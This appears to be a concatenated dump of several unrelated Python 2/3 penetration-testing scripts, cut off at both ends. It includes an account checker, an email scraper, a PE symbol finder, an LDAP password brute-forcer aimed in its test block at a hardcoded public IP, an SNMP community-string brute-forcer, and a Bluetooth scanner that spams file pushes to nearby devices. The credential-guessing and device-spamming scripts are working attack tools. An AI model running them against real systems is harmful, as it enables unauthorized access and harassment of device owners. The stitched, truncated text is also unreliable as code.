+ "] Outputting successful findings and closing\n"
output_success()
print " [" + color['yellow'] + "-" + color['end'] \
+"] tests stopped after %.2f seconds" % (time.clock() - startTime)
print "\n [" + color['red'] + "!" + color['end'] + "] Ctrl+C detected... exiting\n"
if opts.outputfile and not isinstance(opts.outputfile, str):
# if opts.outputfile is an open file, close it to save output
opts.outputfile.close()
os._exit(1)
def query_user(question, default='no'):
# query user for Y/N response
valid = {"yes":True, "y":True, "no":False, "n":False}
if default.lower() == 'yes':
prompt = " [ " + color['yellow'] + "Y" + color['end'] + "/n ] :"
else:
prompt = " [ y/" + color['yellow'] + "N" + color['end'] + " ] :"
while True:
print question + prompt,
try:
choice = raw_input().lower()
except:
print "\n\n [" + color['red'] + "!" + color['end'] \
+ "] Ctrl+C detected... exiting\n"
sys.exit(0)
if choice == '':
if default.lower() == 'yes':
return valid["yes"]
else:
return valid["no"]
elif choice in valid:
return valid[choice]
else:
print "\t[" + color['red'] + "!" + color['end'] \
+ "] Please respond with 'yes' or 'no'\n"
def setup():
# setup command line options
global opts
parser = OptionParser(version="%prog version ::: " + __version__, epilog="\n")
# account options grouping
group = OptionGroup(parser, "Account Options ")
group.add_option(
"-a", "--accountfile",
dest="accountfile",
default="./accountfile.txt",
help="Location of the accounts FILE (1 per line)",
metavar="FILE"
)
group.add_option(
"-u", "--account",
dest="account",
default=[],
action="append",
help="Account(s) to check (comma seperated, no spaces)",
metavar="STRING"
)
parser.add_option_group(group)
# module options grouping
group = OptionGroup(parser, "Module Options ")
group.add_option(
"-l", "--list",
action="store_true",
dest="listmodules",
default=False,
help="List module names and categories",
)
group.add_option(
"-m", "--moduledir",
dest="moduledir",
default="./modules/",
help="Location of the modules directory",
metavar="DIR"
)
group.add_option(
"-s", "--single",
dest="single",
default="",
help="Restrict to specific module name (XML NAME or filename)",
metavar="MODULE"
)
group.add_option(
"-c", "--category",
dest="category",
default=[],
action="append",
help="Restrict modules based on category (comma seperated, no spaces)"
)
parser.add_option_group(group)
# timing options grouping
group = OptionGroup(parser, "Timing Options ")
group.add_option(
"-t", "--threads",
dest="threads",
default=0,
help="Enable threading. Specify max # of threads",
metavar="INT",
type="int"
)
group.add_option(
"-w", "--wait",
dest="wait",
default=False,
help="Throttle tests (e.g. -w 0.5 for 0.5 second delay)",
type="float",
metavar="SECS"
)
group.add_option(
"--retrytime",
dest="retrytime",
default="30",
help="Wait and retry on errormatch (seconds)",
type="int",
metavar="SECS"
)
group.add_option(
"--retries",
dest="retries",
default="1",
help="Number of retries, doubling wait time each retry",
type="int"
)
parser.add_option_group(group)
# output options grouping
group = OptionGroup(parser, "Output Options ")
group.add_option(
"--summary",
action="store_true",
dest="summary",
default=False,
help="Show detailed summary before closing",
)
group.add_option(
"-o", "--output",
dest="outputfile",
default=False,
help="Output results to a file as well as screen",
metavar="FILE"
)
parser.add_option_group(group)
# debug options grouping
group = OptionGroup(parser, "Debug Options")
group.add_option(
"-v", "--verbose",
action="count",
dest="verbose",
help="Print verbose messages to stdout (-vv for very verbose)"
)
group.add_option(
"-d", "--debug",
action="store_true",
dest="debugoutput",
default=False,
help="Store response and headers in ./debug/"
)
group.add_option(
"-?",
action="store_true",
dest="question",
default=False,
help=SUPPRESS_HELP
) # hidden -? handling
parser.add_option_group(group)
(opts, args) = parser.parse_args()
# the following section reworks options as required
# set retries to 1 if retrytime set and not set already
if not opts.retrytime == 30 and \
opts.retries == 0:
# user set retrytime but forgot to set retries to at least 1
opts.retries = 1
# split multiple account names into flat list
if opts.account:
acc_split = []
for a in opts.account:
acc_split.append(a.split(','))
opts.account = sum(acc_split, [])
# remove blanks and invalid entries from accounts
opts.account = filter(None, opts.account)
# split multiple categories into flat list
if opts.category:
cat_split = []
for c in opts.category:
cat_split.append(c.split(','))
opts.category = sum(cat_split, [])
else:
# default to all categories
opts.category = ['all']
# handle help output
if opts.question: # print help on -? also
parser.print_help()
sys.exit(0)
# set verbosity level (-v verbose, -v -v verbose and debug)
if not opts.verbose:
opts.verbose = False
opts.debug = False
elif opts.verbose == 1:
opts.verbose = True
opts.debug = False
elif opts.verbose == 2:
opts.verbose = True
opts.debug = True
elif opts.verbose == 3:
opts.verbose = True
opts.debug = True
# enabled saving of header and response data to ./debug/
opts.debugoutput = True
else:
opts.verbose = True
opts.debug = True
# set ansi colors for supported platforms (colorama support for Windows)
if sys.platform.startswith("win"):
try:
import colorama
colorama.init()
color['red'] = colorama.Fore.RED + colorama.Style.BRIGHT
color['green'] = colorama.Fore.GREEN + colorama.Style.BRIGHT
color['yellow'] = colorama.Fore.YELLOW + colorama.Style.BRIGHT
color['end'] = colorama.Fore.RESET + colorama.Style.RESET_ALL
except:
# disable colors on systems without colorama installed
print "\n\t[!] Colorama Python module not found, color support disabled"
color['red'] = ""
color['green'] = ""
color['yellow'] = ""
color['end'] = ""
else:
# set colors for non-Windows systems
color['red'] = "\033[1;31m"
color['green'] = "\033[1;32m"
color['yellow'] = "\033[1;33m"
color['end'] = "\033[0m"
# error on wait AND threads
if opts.wait and opts.threads > 0:
parser.print_help()
parser.exit(0, "\n\t[" + color['red'] + "!" + color['end'] \
+"] Please don't set throttling (wait) AND threading!\n")
# clear category if single module specified
if opts.single:
opts.category = "single"
# clear accountfile if account specified at command line
if opts.account:
opts.accountfile = "none"
# display selected options for the user
display_options()
# default user_input for cases where none is required
user_input = "none"
# attempt to handle situations where no module or account file is specified
# skip section if module output is selected
if (opts.moduledir == './modules/' and opts.accountfile == './accountfile.txt') \
and not opts.listmodules and not opts.account and \
"all" in (cat.lower() for cat in opts.category):
# accountdir and moduledir are default single/specific account mode not enabled
print "\t[ ] No command-line options specified"
# prompt user as this could be dangerous
user_input = query_user("\t[" + color['yellow'] + "?" + color['end'] \
+"] Test accounts in accountfile.txt against ALL modules? (dangerous)", 'no')
# vary prompts cased on selected options
# case: account(s) specified but modules not set
elif opts.account and opts.moduledir == './modules/' and \
not opts.single and "all" in (cat.lower() for cat in opts.category):
user_input = query_user("\t[" + color['yellow'] + "?" + color['end'] \
+"] Test provided account(s) against ALL modules?", 'yes')
# case: module set but accountfile left at default
elif opts.single and opts.accountfile == './accountfile.txt':
user_input = query_user("\t[" + color['yellow'] + "?" + color['end'] \
+"] Test usernames in accountfile.txt against the selected module?", 'yes')
# case: category set but accountfile left at default
elif opts.category and opts.accountfile == './accountfile.txt' \
and not opts.listmodules:
user_input = query_user("\t[" + color['yellow'] + "?" + color['end'] \
+"] Test accounts in accountfile.txt against selected category?", 'yes')
# handle user_input
if user_input:
# continue using defaults
if not user_input == "none":
print "\t[ ] Continuing...."
else:
print
parser.print_help()
parser.exit(0, "\t[" + color['red'] + "!" + color['end'] \
+"] Please specify arguments\n")
# check if outputfile exists already and prompt to overwrite
if opts.outputfile:
if os.path.exists(opts.outputfile):
# query user to overwrite existing outputfile
user_input = query_user("\t[" + color['yellow'] + "?" + color['end'] \
+"] Overwrite existing outputfile?", 'no')
if user_input:
print "\t[ ] Overwriting output file : %s\n" % opts.outputfile
else:
sys.exit("\n\t[" + color['red'] + "!" + color['end'] \
+"] Please specify new output file\n")
# open output file
try:
opts.outputfile = open(opts.outputfile, "w")
except:
print " [" + color['red'] + "!" + color['end'] \
+ "] Unable to open output file for writing"
if opts.debug:
print "\n\t[" + color['red'] + "!" + color['end'] + "] ",
traceback.print_exc()
def display_options():
# print out the options being used
print "\n ------------------------------------------------------------------------------"
# display accountfile if accounts not specified at commandline
if not opts.account:
print "\t[" + color['yellow'] + "-" + color['end'] +"] Account File :::".ljust(30), \
str(opts.accountfile).ljust(40)
else:
print "\t[" + color['yellow'] + "-" + color['end'] +"] Account(s) :::".ljust(30), \
", ".join(opts.account).ljust(40)
# print module directory
print "\t[" + color['yellow'] + "-" + color['end'] +"] Module Directory :::".ljust(30), \
str(opts.moduledir).ljust(40)
# print categories if not single
if not opts.single:
print "\t[" + color['yellow'] + "-" + color['end'] +"] Categories :::".ljust(30), \
", ".join(opts.category).ljust(40)
else:
print "\t[" + color['yellow'] + "-" + color['end'] +"] Single Module :::".ljust(30), \
str(opts.single).ljust(40)
# display debug level
if opts.debugoutput:
print "\t[" + color['yellow'] + "-" + color['end'] +"] Verbose :::".ljust(30), \
"Debug output to ./debug/".ljust(40)
elif opts.debug:
print "\t[" + color['yellow'] + "-" + color['end'] +"] Verbose :::".ljust(30), \
"Very Verbose".ljust(40)
else:
print "\t[" + color['yellow'] + "-" + color['end'] +"] Verbose :::".ljust(30), \
"Verbose".ljust(40)
# create outputfile and display filename
if opts.outputfile:
# get filename based on current path
file = os.path.realpath(opts.outputfile).replace(os.getcwd(), "")
if file.startswith("\\") or file.startswith("/"):
# strip leading \ from file display
file = file[1:]
print "\t[" + color['yellow'] + "-" + color['end'] +"] Output :::".ljust(30), \
str(file).ljust(40)
# display wait, threads and retries if specified
if opts.wait:
print "\t[" + color['yellow'] + "-" + color['end'] +"] Throttling :::".ljust(30), \
str(opts.wait) + " seconds".ljust(40)
if opts.threads:
print "\t[" + color['yellow'] + "-" + color['end'] +"] Threads :::".ljust(30), \
str(opts.threads) + " threads".ljust(40)
if opts.retries:
print "\t[" + color['yellow'] + "-" + color['end'] +"] Retries (delay) :::".ljust(30), \
str(opts.retries) + " (" + str(opts.retrytime) + " secs)".ljust(40)
print " ------------------------------------------------------------------------------\n"
class NullHTTPErrorProcessor(urllib2.HTTPErrorProcessor):
# return contents without throwing errors (not everything in life is a 200 OK)
def http_response(self, request, response):
return response
def https_response(self, request, response):
return response
def main():
logo()
setup()
load_modules()
load_accounts()
testcases = create_testcases()
request_handler(testcases)
# print success matches at the end
print "\n [" + color['yellow'] + "-" + color['end'] \
+"] tests completed in %.2f seconds" \
% (time.clock() - startTime)
if len(success) > 0:
print " [" + color['yellow'] + "+" + color['end'] \
+"] %d matches found" \
% len(success)
output_success()
else:
sys.exit("\n\t[" + color['red'] + "!" + color['end'] \
+ "] No matches found. Exiting!")
signal.signal(signal.SIGINT, signal_handler)
main()
| 39.999301 | 115 | 0.516323 |
Python-Penetration-Testing-for-Developers | import urllib2
import re
import sys
tarurl = sys.argv[1]
url = urllib2.urlopen(tarurl).read()
regex = re.compile(("([a-z0-9!#$%&'*+\/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+\/=?^_`"
"{|}~-]+)*(@|\sat\s)(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?(\.|"
"\sdot\s))+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?)"))
print"<MaltegoMessage>"
print"<MaltegoTransformResponseMessage>"
print" <Entities>"
emails = re.findall(regex, url)
for email in emails:
print" <Entity Type=\"maltego.EmailAddress\">"
print" <Value>"+str(email[0])+"</Value>"
print" </Entity>"
print" </Entities>"
print"</MaltegoTransformResponseMessage>"
print"</MaltegoMessage>" | 30.428571 | 79 | 0.561457 |
PenetrationTestingScripts | #coding=utf-8
import time
import threading
from printers import printPink,printGreen
from multiprocessing.dummy import Pool
import ldap
class ldap_burp(object):
def __init__(self,c):
self.config=c
self.lock=threading.Lock()
self.result=[]
self.lines=self.config.file2list("conf/ldapd.conf")
def ldap_connect(self,ip,username,password,port):
creak=0
try:
ldappath='ldap://'+ip+':'+port+'/'
l = ldap.initialize(ldappath)
re=l.simple_bind(username,password)
if re==1:
creak=1
except Exception,e:
if e[0]['desc']=="Can't contact LDAP server":
creak=2
pass
return creak
def ldap_creak(self,ip,port):
try:
for data in self.lines:
username=data.split(':')[0]
password=data.split(':')[1]
flag=self.ldap_connect(ip,username,password,port)
if flag==2:
self.lock.acquire()
printGreen("%s ldap at %s can't connect\r\n" %(ip,port))
self.lock.release()
break
if flag==1:
self.lock.acquire()
printGreen("%s ldap at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.result.append("%s ldap at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.lock.release()
break
else:
self.lock.acquire()
print "%s ldap service 's %s:%s login fail " %(ip,username,password)
self.lock.release()
except Exception,e:
pass
def run(self,ipdict,pinglist,threads,file):
if len(ipdict['ldap']):
printPink("crack ldap now...")
print "[*] start ldap %s" % time.ctime()
starttime=time.time()
pool=Pool(threads)
for ip in ipdict['ldap']:
pool.apply_async(func=self.ldap_creak,args=(str(ip).split(':')[0],str(ip).split(':')[1]))
pool.close()
pool.join()
print "[*] stop ldap serice %s" % time.ctime()
print "[*] crack ldap done,it has Elapsed time:%s " % (time.time()-starttime)
for i in xrange(len(self.result)):
self.config.write_file(contents=self.result[i],file=file)
if __name__ == '__main__':
import sys
sys.path.append("../")
from comm.config import *
c=config()
ipdict={'ldap': ['124.172.223.236:389']}
pinglist=['192.168.1.1']
test=ldap_burp(c)
test.run(ipdict,pinglist,50,file="../result/test")
| 32.045977 | 126 | 0.492693 |
cybersecurity-penetration-testing | #!/usr/bin/python3
#
# A script that enumerates Imports and Exports of PE files and prints them according to search criterias.
#
# Let's the user find imported/exported symbols matching criterias such as:
# - symbol being import or export
# - symbol matching name
# - symbol NOT matching name
# - module matching name
# - module NOT matching name
#
# Mariusz Banach / mgeeky, '21
# <mb [at] binary-offensive.com>
#
import os
import re
import sys
import glob
import json
import time
import signal
import pprint
import pefile
import tabulate
import platform
import textwrap
import argparse
import tempfile
import subprocess
import multiprocessing
from datetime import datetime
from itertools import product
from multiprocessing import Pool, Queue, Process, freeze_support, Manager, Lock
DEFAULT_COLUMN_SORTED = 'filename'
headers = [
'filename',
'symbol type',
'module',
'symbol',
'file size',
'path',
]
symbol_idx = headers.index('symbol')
class Logger:
colors_map = {
'red': 31,
'green': 32,
'yellow': 33,
'blue': 34,
'magenta': 35,
'cyan': 36,
'white': 37,
'grey': 38,
}
colors_dict = {
'error': colors_map['red'],
'trace': colors_map['magenta'],
'info ': colors_map['green'],
'debug': colors_map['grey'],
'other': colors_map['grey'],
}
@staticmethod
def with_color(c, s):
return "\x1b[%dm%s\x1b[0m" % (c, s)
@staticmethod
def end_color(s):
return "%s\x1b[0m" % (s)
@staticmethod
def colored(args, txt, col):
if not args.color:
return txt
return Logger.with_color(Logger.colors_map[col], txt)
def out(x):
sys.stderr.write(x + '\n')
def verbose(args, x):
if args.verbose:
sys.stderr.write('[verbose] ' + x + '\n')
def collectImports(args, mod):
imports = []
if not hasattr(mod, 'DIRECTORY_ENTRY_IMPORT') or not mod.DIRECTORY_ENTRY_IMPORT:
return imports
try:
for entry in mod.DIRECTORY_ENTRY_IMPORT:
module = entry.dll.decode('utf-8').lower()
for func in entry.imports:
if not func.name:
continue
func = func.name.decode()
imports.append(('import', module, func))
except Exception as e:
verbose(args, f'Exception occured while collecting PE imports: {e}')
return imports
def collectExports(args, filename, mod):
exports = []
if not hasattr(mod, 'DIRECTORY_ENTRY_EXPORT') or not mod.DIRECTORY_ENTRY_EXPORT:
return exports
try:
for entry in mod.DIRECTORY_ENTRY_EXPORT.symbols:
if not entry.name:
continue
func = entry.name.decode()
exports.append(('export', os.path.basename(filename), func))
except Exception as e:
verbose(args, f'Exception occured while collecting PE exports: {e}')
return exports
def verifyCriterias(args, regexes, infos, uniqueSymbols):
if args.unique and infos['symbol'] in uniqueSymbols:
verbose(args, f'(-) Skipping symbol {infos["module"]}.{infos["symbol"]} because it is not unique in our results.')
return False
if args.imports and infos['symbol type'] != 'import':
verbose(args, f'(-) Skipping symbol {infos["module"]}.{infos["symbol"]} because it was not an import.')
return False
if args.exports and infos['symbol type'] != 'export':
verbose(args, f'(-) Skipping symbol {infos["module"]}.{infos["symbol"]} because it was not an export.')
return False
regexesVerified = sum([len(v) for k, v in regexes.items()])
regexes_name = len(regexes['name'])
regexes_not_name = len(regexes['not-name'])
regexes_module = len(regexes['module'])
regexes_not_module = len(regexes['not-module'])
for name, rex in regexes['not-name']:
match = rex.search(infos['symbol'])
if match:
matched = match.group(1)
infos['symbol'] = infos['symbol'].replace(matched, Logger.colored(args, matched, 'red'))
verbose(args, f'(-) Skipping symbol {infos["module"]}.{infos["symbol"]} as it DID satisfy not-name ({name}) regex.')
return False
if regexes_not_module+regexes_module+regexes_name == 0:
verbose(args, f'(+) Symbol {infos["module"]}.{infos["symbol"]} satisfied all criterias.')
return True
for name, rex in regexes['not-module']:
match = rex.search(infos['module'])
if match:
matched = match.group(1)
infos['module'] = infos['module'].replace(matched, Logger.colored(args, matched, 'red'))
verbose(args, f'(-) Skipping symbol\'s module {infos["module"]}.{infos["symbol"]} as it DID satisfy not-module ({name}) regex.')
return False
if regexes_module+regexes_name == 0:
verbose(args, f'(+) Symbol {infos["module"]}.{infos["symbol"]} satisfied all criterias.')
return True
satisifed = False
carryOn = False
if len(regexes['module']) > 0:
for name, rex in regexes['module']:
match = rex.search(infos['module'])
if match:
matched = match.group(1)
infos['module'] = infos['module'].replace(matched, Logger.colored(args, matched, 'green'))
verbose(args, f'(+) Symbol\'s module {infos["module"]}.{infos["symbol"]} satisfied module ({name}) regex.')
carryOn = True
break
else:
carryOn = True
if regexes_name == 0:
verbose(args, f'(+) Symbol {infos["module"]}.{infos["symbol"]} satisfied all criterias.')
return True
if carryOn:
for name, rex in regexes['name']:
match = rex.search(infos['symbol'])
if match:
matched = match.group(1)
infos['symbol'] = infos['symbol'].replace(matched, Logger.colored(args, matched, 'green'))
verbose(args, f'(+) Symbol {infos["module"]}.{infos["symbol"]} satisfied name ({name}) regex.')
satisifed = True
break
if regexesVerified == 0 or satisifed:
verbose(args, f'(+) Symbol {infos["module"]}.{infos["symbol"]} satisfied all criterias.')
return True
else:
verbose(args, f'(-) Skipping symbol {infos["module"]}.{infos["symbol"]} as it DID NOT satisfy all criterias.')
return False
def processFileWorker(arguments):
out = None
try:
(args, regexes, path, results, uniqueSymbols, filesProcessed, symbolsProcessed) = arguments
out = processFile(args, regexes, path, results, uniqueSymbols, filesProcessed, symbolsProcessed)
except (KeyboardInterrupt, SystemExit) as e:
out(e)
return out
def processFile(args, regexes, path, results, uniqueSymbols, filesProcessed, symbolsProcessed):
verbose(args, 'Processing file: ' + path)
mod = None
try:
mod = pefile.PE(path, fast_load = True)
mod.parse_data_directories()
except:
mod.close()
return
imports = collectImports(args, mod)
exports = collectExports(args, os.path.basename(path), mod)
symbols = imports + exports
mod.close()
once = False
for (symbolType, symbolModule, symbolName) in symbols:
infos = {
'path' : path,
'filename' : os.path.basename(path),
'file size' : os.path.getsize(path),
'symbol type' : symbolType,
'symbol' : symbolName,
'module' : symbolModule,
}
if not once:
assert len(infos.keys()) == len(headers), "headers and infos.keys() mismatch"
assert list(infos.keys()).sort() == list(headers).sort(), "headers and infos.keys() mismatch while sorted"
once = True
if args.format == 'text':
appendRow = verifyCriterias(args, regexes, infos, uniqueSymbols)
if args.color:
if infos['symbol type'] == 'import':
infos['symbol type'] = Logger.colored(args, infos['symbol type'], 'cyan')
else:
infos['symbol type'] = Logger.colored(args, infos['symbol type'], 'yellow')
if appendRow:
row = []
MaxWidth = 40
for h in headers:
obj = None
if type(infos[h]) == set or type(infos[h]) == list or type(infos[h]) == tuple:
obj = ', '.join(infos[h])
else:
obj = infos[h]
if type(obj) == str and len(obj) > MaxWidth:
if h == 'path':
obj = '\n'.join(textwrap.wrap(obj, width = 2 * MaxWidth))
else:
obj = '\n'.join(textwrap.wrap(obj, width = MaxWidth))
row.append(obj)
results.append(row)
uniqueSymbols.append(symbolName)
#verbose(args, 'Processed results:\n' + pprint.pformat(infos))
else:
verbose(args, f'Symbol {symbolModule}.{symbolName} did not met filter criterias.')
elif args.format == 'json':
appendRow = verifyCriterias(args, regexes, infos, uniqueSymbols)
if args.color:
if infos['symbol type'] == 'import':
infos['symbol type'] = Logger.colored(args, infos['symbol type'], 'cyan')
else:
infos['symbol type'] = Logger.colored(args, infos['symbol type'], 'yellow')
if appendRow:
results.append(infos)
uniqueSymbols.append(symbolName)
#verbose(args, 'Processed results:\n' + pprint.pformat(infos))
else:
verbose(args, f'Symbol {symbolModule}.{symbolName} did not met filter criterias.')
filesProcessed.value += 1
symbolsProcessed.value += len(symbols)
def trap_handler(signum, frame):
out('[-] CTRL-C pressed. Wait a minute until all processes wrap up or manually terminate python\'s child processes tree.')
def init_worker():
signal.signal(signal.SIGINT, trap_handler)
def processDir(args, regexes, path, results, uniqueSymbols, filesProcessed, symbolsProcessed):
filePaths = []
out('[.] Building list of files to process...')
for file in glob.glob(os.path.join(path, '**'), recursive=args.recurse):
try:
if len(args.extension) > 0:
skip = True
for ext in args.extension:
if file.lower().endswith(f'.{ext}'):
skip = False
break
if skip:
verbose(args, f'[-] Skipping file as it not matched extension ({ext}): {file}')
continue
if os.path.isfile(file):
looks_like_pe = False
with open(file, 'rb') as f:
mz = f.read(2)
if len(mz) == 2:
looks_like_pe = (mz[0] == ord('M') and mz[1] == ord('Z')) or (mz[1] == ord('M') and mz[0] == ord('Z'))
if looks_like_pe: filePaths.append(file)
except Exception as e:
verbose(args, f'[-] Could not open file: ({file}). Exception: {e}')
continue
cpu_count = multiprocessing.cpu_count()
pool = Pool(cpu_count, initializer=init_worker)
try:
arguments = [[args, regexes, _path, results, uniqueSymbols, filesProcessed, symbolsProcessed] for _path in filePaths]
out(f'[.] Scanning {Logger.colored(args, len(filePaths), "yellow")} files...')
if len(filePaths) > 5000:
out(f'[.] Be patient that\'s gonna take a long while...')
res = pool.map(processFileWorker, arguments)
except KeyboardInterrupt:
out(f'[-] User interrupted the scan after {Logger.colored(args, filesProcessed.value, "red")} files.')
pool.terminate()
pool.join()
def opts(argv):
params = argparse.ArgumentParser(
prog = argv[0],
usage='%(prog)s [options] <path>'
)
params.add_argument('path', help = 'Path to a PE file or directory.')
params.add_argument('-r', '--recurse', action='store_true', help='If <path> is a directory, perform recursive scan.')
params.add_argument('-v', '--verbose', action='store_true', help='Verbose mode.')
params.add_argument('-f', '--format', choices=['text', 'json'], default='text', help='Output format. Text or JSON.')
params.add_argument('-E', '--extension', default=[], action='append', help='Extensions of files to scan. By default will scan all files. Can be repeated: -E exe -E dll')
params.add_argument('-o', '--output', metavar='PATH', help='Write output to file.')
params.add_argument('-C', '--color', default=False, action='store_true', help='Add colors to text output. May uglify table text output')
sorting = params.add_argument_group('Output sorting')
sorting.add_argument('-u', '--unique', action='store_true', help = 'Return unique symbols only. The first symbol with a name that occurs in results, will be returned.')
sorting.add_argument('-d', '--descending', action='store_true', help = 'Sort in descending order instead of default of descending.')
sorting.add_argument('-c', '--column', default=DEFAULT_COLUMN_SORTED, choices=headers, metavar='COLUMN', help = 'Sort by this column name. Default: filename. Available columns: "' + '", "'.join(headers) + '"')
sorting.add_argument('-n', '--first', type=int, default=0, metavar='NUM', help='Show only first N results, as specified in this paremeter. By default will show all candidates.')
filters = params.add_argument_group('Output filtering')
filters.add_argument('-i', '--imports', action='store_true', help = 'Filter only Imports.')
filters.add_argument('-e', '--exports', action='store_true', help = 'Filter only Exports.')
filters.add_argument('-s', '--name', action='append', default=[], help = 'Search for symbols with name matching this regular expression. Can be repeated, case insensitive')
filters.add_argument('-S', '--not-name', action='append', default=[], help = 'Search for symbols with name NOT matching this regular expression.')
filters.add_argument('-m', '--module', action='append', default=[], help = 'Search for symbols exported in/imported from this module matching regular expression.')
filters.add_argument('-M', '--not-module', action='append', default=[], help = 'Search for symbols NOT exported in/NOT imported from this module matching regular expression.')
args = params.parse_args()
if args.imports and args.exports:
out('[!] --imports and --exports are mutually exclusive. Pick only one of them!')
sys.exit(1)
accomodate_rex = lambda x: f'({x})'
regexes = {
'name': [],
'not-name': [],
'module': [],
'not-module': []
}
for name in args.name:
regexes['name'].append((name, re.compile(accomodate_rex(name), re.I)))
for not_name in args.not_name:
regexes['not-name'].append((not_name, re.compile(accomodate_rex(not_name), re.I)))
for module in args.module:
regexes['module'].append((module, re.compile(accomodate_rex(module), re.I)))
for not_module in args.not_module:
regexes['not-module'].append((not_module, re.compile(accomodate_rex(not_module), re.I)))
for i in range(len(args.extension)):
args.extension[i] = args.extension[i].lower()
if args.extension[i].startswith('.'):
args.extension[i] = args.extension[i][1:]
return args, regexes
def main():
results = Manager().list()
uniqueSymbols = Manager().list()
filesProcessed = Manager().Value('i', 0)
symbolsProcessed = Manager().Value('i', 0)
out('''
:: findSymbols.py - Finds PE Import/Exports based on supplied filters.
Mariusz Banach / mgeeky, '21
<mb [at] binary-offensive.com>
''')
args, regexes = opts(sys.argv)
is_wow64 = (platform.architecture()[0] == '32bit' and 'ProgramFiles(x86)' in os.environ)
start_time = datetime.now()
try:
if '\\system32\\' in args.path.lower() and is_wow64:
verbose(args, 'Redirecting input path from System32 to SysNative as we run from 32bit Python.')
args.path = args.path.lower().replace('\\system32\\', '\\SysNative\\')
if os.path.isdir(args.path):
processDir(args, regexes, args.path, results, uniqueSymbols, filesProcessed, symbolsProcessed)
else:
if not os.path.isfile(args.path):
out(f'[!] Input file does not exist! Path: {args.path}')
sys.exit(1)
processFile(args, regexes, args.path, results, uniqueSymbols, filesProcessed, symbolsProcessed)
except KeyboardInterrupt:
out(f'[-] User interrupted the scan.')
time_elapsed = datetime.now() - start_time
if args.format == 'json':
resultsList = list(results)
dumped = str(json.dumps(resultsList, indent=4))
if args.output:
with open(args.output, 'w') as f:
f.write(dumped)
else:
print('\n' + dumped)
else:
resultsList = list(results)
if len(resultsList) > 0:
idx = headers.index(args.column)
resultsList.sort(key = lambda x: x[idx], reverse = args.descending)
headers[idx] = '▼ ' + headers[idx] if args.descending else '▲ ' + headers[idx]
if args.first > 0:
for i in range(len(resultsList) - args.first):
resultsList.pop()
table = tabulate.tabulate(resultsList, headers=['#',] + headers, showindex='always', tablefmt='pretty')
if args.output:
with open(args.output, 'w', encoding='utf-8') as f:
f.write(str(table))
else:
print('\n' + table)
if args.first > 0:
out(f'\n[+] Found {Logger.colored(args, len(resultsList), "green")} symbols meeting all the criterias (but shown only first {Logger.colored(args, args.first, "magenta")} ones).\n')
else:
out(f'\n[+] Found {Logger.colored(args, len(resultsList), "green")} symbols meeting all the criterias.\n')
else:
out(f'[-] Did not find symbols meeting specified criterias.')
out(f'[.] Processed {Logger.colored(args, filesProcessed.value, "green")} files and {Logger.colored(args, symbolsProcessed.value, "green")} symbols.')
out('[.] Time elapsed: {}'.format(Logger.colored(args, time_elapsed, "magenta")))
if __name__ == '__main__':
freeze_support()
main() | 36.084149 | 213 | 0.585625 |
PenetrationTestingScripts | #coding=utf-8
import time
import threading
from printers import printPink,printGreen
from multiprocessing.dummy import Pool
from pysnmp.entity.rfc3413.oneliner import cmdgen
class snmp_burp(object):
def __init__(self,c):
self.config=c
self.lock=threading.Lock()
self.result=[]
self.lines=self.config.file2list("conf/snmp.conf")
def snmp_connect(self,ip,key):
crack =0
try:
errorIndication, errorStatus, errorIndex, varBinds =\
cmdgen.CommandGenerator().getCmd(
cmdgen.CommunityData('my-agent',key, 0),
cmdgen.UdpTransportTarget((ip, 161)),
(1,3,6,1,2,1,1,1,0)
)
if varBinds:
crack=1
except:
pass
return crack
def snmp_l(self,ip,port):
try:
for data in self.lines:
flag=self.snmp_connect(ip,key=data)
if flag==1:
self.lock.acquire()
printGreen("%s snmp has weaken password!!-----%s\r\n" %(ip,data))
self.result.append("%s snmp has weaken password!!-----%s\r\n" %(ip,data))
self.lock.release()
break
else:
self.lock.acquire()
print "test %s snmp's scan fail" %(ip)
self.lock.release()
except Exception,e:
pass
def run(self,ipdict,pinglist,threads,file):
printPink("crack snmp now...")
print "[*] start crack snmp %s" % time.ctime()
starttime=time.time()
pool=Pool(threads)
for ip in pinglist:
pool.apply_async(func=self.snmp_l,args=(str(ip).split(':')[0],""))
pool.close()
pool.join()
print "[*] stop crack snmp %s" % time.ctime()
print "[*] crack snmp done,it has Elapsed time:%s " % (time.time()-starttime)
for i in xrange(len(self.result)):
self.config.write_file(contents=self.result[i],file=file)
| 31.757576 | 98 | 0.503933 |
cybersecurity-penetration-testing | #
# Bluetooth scanner with ability to spam devices
# with incoming OBEX Object Push requests containing
# specified file.
#
# Mariusz Banach / MGeeky, 16'
#
# Partially based on `Violent Python` snippets.
# Modules required:
# python-bluez
# python-obexftp
#
import bluetooth
import scapy
import obexftp
import sys
import optparse
import threading
import time
import os
foundDevs = []
def printDev(name, dev, txt='Bluetooth device'):
print '[+] %s: "%s" (MAC: %s)' % (txt, name, dev)
def retBtAddr(addr):
btAddr = str(hex(int(addr.replace(':', ''), 16) + 1))[2:]
btAddr = btAddr[0:2] + ':' + btAddr[2:4] + ':' + btAddr[4:6] + \
':' + btAddr[6:8] + ':' + btAddr[8:10] + ':' + btAddr[10:12]
return btAddr
def checkBluetooth(btAddr):
btName = bluetooth.lookup_name(btAddr)
if btName:
printDev('Hidden Bluetooth device detected', btName, btAddr)
return True
return False
def sendFile(dev, filename):
if os.path.exists(filename):
client = obexftp.client(obexftp.BLUETOOTH)
channel = obexftp.browsebt(dev, obexftp.PUSH)
print '[>] Sending file to %s@%s' % (dev, str(channel))
client.connect(dev, channel)
ret = client.put_file(filename)
if int(ret) >= 1:
print '[>] File has been sent.'
else:
print '[!] File has not been accepted.'
client.disconnect()
else:
print '[!] Specified file: "%s" does not exists.'
def findDevs(opts):
global foundDevs
devList = bluetooth.discover_devices(lookup_names=True)
repeat = range(0, int(opts.repeat))
for (dev, name) in devList:
if dev not in foundDevs:
name = str(bluetooth.lookup_name(dev))
printDev(name, dev)
foundDevs.append(dev)
for i in repeat:
sendFile(dev, opts.file)
continue
if opts.spam:
for i in repeat:
sendFile(dev, opts.file)
def main():
parser = optparse.OptionParser(usage='Usage: %prog [options]')
parser.add_option('-f', '--file', dest='file', metavar='FILE', help='Specifies file to be sent to discovered devices.')
parser.add_option('-t', '--time', dest='time', metavar='TIMEOUT', help='Specifies scanning timeout (default - 0 secs).', default='0')
